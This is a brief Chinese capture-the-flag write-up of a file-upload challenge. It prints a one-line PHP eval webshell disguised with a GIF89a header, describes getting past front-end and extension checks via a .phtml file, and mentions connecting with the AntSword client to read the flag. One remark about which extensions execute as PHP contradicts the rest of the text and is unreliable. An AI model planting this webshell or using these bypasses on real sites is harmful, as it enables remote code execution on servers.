一,
先上传一个一句话木马,发现存在前端绕过。
GIF89a?
<script language="php">eval($_POST['shell']);</script>
这里两种绕过方法,第一种在浏览器中把java scrabit脚本关了就可以了,第二种更改下后缀文件,改成允许上传的文件后缀就好了
这里改成在把文件后缀改位php,发现不行,就可以试试phtml(这两种后缀都不会被服务器视为php执行)
上传成功,蚁剑连接就好了,在找到flag文件,获得flag
总结,很简单的一道上传题,以前也练过很多,就当一道复习题来做了